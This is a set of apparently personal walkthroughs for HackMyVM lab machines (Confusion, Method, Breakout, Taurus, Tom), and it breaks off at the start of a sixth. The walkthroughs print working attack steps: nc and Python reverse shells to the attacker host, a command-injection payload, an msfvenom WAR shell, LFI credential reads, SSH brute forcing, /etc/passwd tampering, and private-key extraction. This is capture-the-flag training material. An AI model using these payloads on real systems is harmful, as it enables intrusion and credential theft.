HackMyVm Confusion Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log    
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 15:59 CST
 Nmap scan report for 192.168.56.100
 Host is up (0.0040s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 32145/tcp open  unknown
 | fingerprint-strings:
 |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, NULL, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
 |     Welcome To The My Magic World
 |     many times you want to ping?:
 ...

Use nc to connect port 32145.

 ~ nc 192.168.56.100 32145                
 Welcome To The My Magic World

 How many times you want to ping?: 2
 PING localhost(localhost (::1)) 56 data bytes
 64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.086 ms
 64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.035 ms

If we input some invalid number, we will get error msg.

 ~ nc 192.168.56.100 32145                  
 Welcome To The My Magic World

 How many times you want to ping?: 12;
 Traceback (most recent call last):
   File "/opt/ping.py", line 7, in <module>
     no_of_packets = int(input("How many times you want to ping?: "))
   File "<string>", line 1
     12;
       ^
 SyntaxError: unexpected EOF while parsing
 ^C⏎                                          

If we input some evil code, we can make it run.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: import("os").system("id")
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
PING localhost(localhost (::1)) 56 data bytes

So we can get reverse shell.

 ```bash
~ nc 192.168.56.100 32145      
 Welcome To The My Magic World

 How many times you want to ping?: __import__("os").system("nc 192.168.56.150 1234 -e /bin/bash")
 ──────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234                          
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39196.
 id  
 uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)

Spawn an interactive shell.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
iamroot@confusion:/$ id
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
iamroot@confusion:/$

Upload id_rsa.pub to get ssh login as iamroot.

 ```bash
iamroot@confusion:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys

We found 3 users, and check sudo -l.

```bash
iamroot@confusion:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 25 08:44 .
drwxr-xr-x 18 root root 4096 Oct 25 06:02 ..
drwxr-xr-x 2 iamroot iamroot 4096 Oct 25 15:16 iamroot
drwxr-xr-x 3 sammy sammy 4096 Oct 25 14:56 sammy
drwxr-xr-x 2 still still 4096 Oct 25 14:56 still
iamroot@confusion:/home$ sudo -l
sudo -l
Matching Defaults entries for iamroot on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User iamroot may run the following commands on confusion:
(!root) NOPASSWD: /bin/bash

But no matter what I input, still need input password.

Then we check the ssh login msg of user still.

 ```bash
~ ssh still@192.168.56.100  
 Have you ever thought?
      If
  Cindrella's
    Shoe Fit
   Perfectly
    Then Why
   Did It Fall
     Off?
 still:confused?
 Then go for Port 32145 :)

The default shell has been modified for still.

 iamroot@confusion:/home$ cat /etc/passwd
 ...
 still:x:1001:1001::/home/still:/home/still/SoMuchConfusion

We can check the source code of /home/still/SoMuchConfusion.

```bash
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
cat /home/still/SoMuchConfusion

!/bin/bash echo "Welcome To My Secret Most Secure Shell :p" read secure_shell if [[ $secure_shell == "id" ]] then echo "uid=0(root) gid=0(root) groups=0(root)" elif [[ $secure_shell == "whoami" ]] then echo "root" elif [[ $secure_shell =

= "python3" ]] then echo `$secure_shell` elif [[ $secure_shell =~ ^nc || $secure_shell =~ ^bash || $secure_shell =~ ^python* ]] then echo "Smooooooth Hehe :p" elif [[ -z $secure_shell ]] then echo "Bye-Bye" else echo `$secure_shell` com
mand not found fi command not found

So we need to bypass the blacklist to get a shell as user still. Here I choose /usr/bin/dash.

 ```bash
iamroot@confusion:/home$ su still
 Password:
 Welcome To My Secret Most Secure Shell :p
 /usr/bin/dash -i
 $ nc 192.168.56.150 1234 -e /bin/bash
 ───────────────────────────────────────────────────
 ~ nc -nlvp 1234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39226.
 id
 uid=1001(still) gid=1001(still) groups=1001(still)

Spawn interactive shell again, and check sudo -l.

```bash
still@confusion:~$ sudo -l
sudo -l
Matching Defaults entries for still on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:
(sammy) NOPASSWD: /usr/bin/python3 /opt/password.py

Run it, we get an encrypted string.

 ```bash
still@confusion:~$ sudo -u sammy /usr/bin/python3 /opt/password.py
 sudo -u sammy /usr/bin/python3 /opt/password.py
 QWJCYXJQbmFQZW5weFpsQ25mZmpiZXEK

Try to decrypt it with ROT13. Then we can login as user sammy.

 ~ ssh sammy@192.168.56.100    ...
 sammy@192.168.56.100's password:
 sammy@confusion:~$ id
 uid=1000(sammy) gid=1000(sammy) groups=1000(sammy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Check sudo -l.

```bash
sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:
(root) NOPASSWD: /usr/bin/unzip

Then we can modify /etc/passwd, zip it, and unzip it back to /etc.

```bash
 sammy@confusion:~$ cp /etc/passwd ./
 sammy@confusion:~$ openssl passwd 123
 fpjdFvRQf46EA
 sammy@confusion:~$ echo "root2:fpjdFvRQf46EA:0:0:root:/root:/bin/bash" >> passwd
 sammy@confusion:~$ zip passwd.zip passwd
   adding: passwd (deflated 63%)
 sammy@confusion:~$ sudo unzip passwd.zip -d /etc
 Archive:  passwd.zip
   inflating: /etc/etc/passwd        
 replace /etc/passwd? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
   inflating: /etc/passwd

Finally get root.

 sammy@confusion:~$ su root2
 Password:
 root@confusion:/home/sammy# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 confusion

HackMyVm Method Walkthrough

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80, remember to enable .htm ext.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b
401,403,404,500 --wildcard -o 80.log --exclude-length 3690

/index.htm (Status: 200) [Size: 344]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0]
[--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]```;

Check source code of index.htm.

```bash
~ curl http://192.168.56.100/index.htm fish-0 | 0 [09:45:55]
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>

With the hint from index.htm, we can call secret.php with param HackMyVM.

 ```bash
~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'  
 Now the main part what it is loooooool<br>Try other method⏎

Seem get method is no correct. Let's try post method.

```bash
~ curl 'http://192.168.56.100/secret.php'; -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>⏎

Then we can get reverse shell.

 ```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check source code of secret.php

```bash
www-data@method:~/html$ cat secret.php
cat secret.php
<?php
...
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg";);
}
$ok="prakasaka:th3-!llum!n@t0r";
?>

Escalate to user prakasaka.

 ```bash
www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in ssh as user prakasaka, check sudo -l.

```bash
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip

We can get root.

 ```bash
prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh

 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method

HackMyVm Breakout Walkthrough

Key points: good enum

https://hackmyvm.eu/machines/machine.php?vm=Breakout

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for 192.168.33.145                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            

Check source code of index.html at port 80.

<!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

 -->

It's brainfuck code. Decode it online, get string `".2uqPEfj3D<P'a-3"`.

Use enum4linux to enum.

```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)

With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.

image-20211022224903817.png

Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.

 ```bash
~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$

Search cap.

```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep

And we found password backup.

 ```bash
cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak

We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h

Finally we get root.

```bash
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout

HackMyVm Taurus Walkthrough

Keypoints: generate custom dic, tcpdump, IPv6

https://hackmyvm.eu/machines/machine.php?vm=Taurus

Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 PORT   STATE    SERVICE VERSION
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 PORT    STATE         SERVICE
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp

Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public 192.168.56.100    
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
 iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
 iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01

...

Here is the tricky part. In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

~ cupp -i        
  ___________                                                                              
    cupp.py!                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                             [ Mebus | https://github.com/Mebus/]

 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)

 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):
 ...

Successfully get the password of sarah.

```bash
~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100 ssh -t64 -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
[DATA] attacking ssh://192.168.56.100:22/
[22][ssh] host: 192.168.56.100 login: sarah password: Sarah_2012
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26

In sarah's home folder, found a file default.tar, which is unreadable now.

 ```bash
sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority

Check sudo -l of user.

```bash
sarah@taurus:~$ sudo -l
Matching Defaults entries for sarah on taurus:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sarah may run the following commands on taurus:
(marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp

Try to run it.  The ftp port opened and closed again quickly.

 ```bash
sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.

Open another ssh terminal, run tcpdump to get data.

```bash
sarah@taurus:~$ tcpdump -i lo -nn -A
...
17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 34: FTP: 331 Password required for marion
`....B.@.....................................H*9.........J.....
.{wh.{wh331 Password required for marion

17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
length 0
`.EX. .@.........................................H*[.....(.....
.{wh.{wh
17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 18: FTP: PASS ilovesushis
...

Escalate to user marion, check sudo -l again.

 ```bash
sarah@taurus:~$ su marion
 Password:
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar

Use ptar to pack /root/ to /tmp/, then extract it use tar.

```bash
marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ tar -xvf root.tar -C ./
tar: Removing leading `//' from member names
//root
tar: Removing leading `/' from member names
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
...

Get root with ssh.

 ```bash
marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 taurus

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: tomcat configuration and upload

Scan ports.

~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                      
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

<!--more-->

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/tomcat.php (Status: 200) [Size: 0]

Fuzz tomcat.php.

 ```bash
~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"  

Get /etc/passwd.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
...
tomcat:x:1001:1001::/opt/tomcat:/bin/false

We need to get home dir of tomcat.

 ```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'                    fish-0 | 0 [10:29:59]
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target

 [Service]
 Type=forking

 User=tomcat
 Group=tomcat

 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"

 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh

 [Install]
 WantedBy=multi-user.target

Check password file at tomcat HOME dir.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml';
...
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
</tomcat-users>

Generate reverse shell for tomcat and upload.

 ```bash
~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war      
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war

 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]

Get reverse shell.

```bash
~ curl 'http://192.168.56.100:8080/upload/rev.war';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234 fish-0 | 0 [10:48:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52234.
id
uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)

Check sudo -l.

 ```bash
tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read id_rsa of user nathan.

```bash
sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
<~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...

Decode ascii85 online, then get id_rsa.

 ```bash
-----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...

Decrypt id_rsa.

```bash
~ /usr/share/john/ssh2john.py id_rsa > hash
~ john --wordlist=/usr/share/wordlists/rockyou.txt hash bash-0 | 1 [11:08:11]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
darkness (id_rsa)
1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
Session aborted

Login ssh as usr nathan, check sudo -l.

```bash
 ~ ssh nathan@192.168.56.100 -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp

Get root.

nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan# 

HackMyVm Hat Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Nmap scan ports.

nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
